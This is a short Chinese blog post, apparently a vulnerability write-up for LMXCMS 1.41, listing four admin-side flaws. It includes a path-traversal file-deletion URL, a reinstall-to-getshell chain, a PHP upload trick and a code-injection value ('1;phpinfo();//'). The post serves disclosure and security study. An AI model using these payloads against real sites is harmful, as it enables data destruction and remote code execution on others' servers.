前言
梦想CMS
版本:1.41版
官方网址:http://www.lmxcms.com/down/xitong/
提示:以下是本篇文章正文内容,下面案例仅供参考
一、后台任意文件删除
漏洞位置:./c/admin/BackdbAction.class.php
漏洞实现:
EXP:
http://127.0.0.1/admin.php?m=Backdb&a=delbackdb&filename=../../test.txt
二、重装GetShell漏洞
漏洞实现
使用任意文件删除漏洞删除install_ok.txt可以重装CMS
三、后台任意文件上传
漏洞实现
基本设置->文件设置
在后台允许上传图片类型加上php就可以上传php文件
但是问题是怎么进入后台呢
四、后台代码执行
漏洞位置:./c/admin/AcquisiAction.class.php
漏洞实现
在数据库的表中加入,data字段的值为1;phpinfo();//
EXP:


3847

被折叠的 条评论
为什么被折叠?



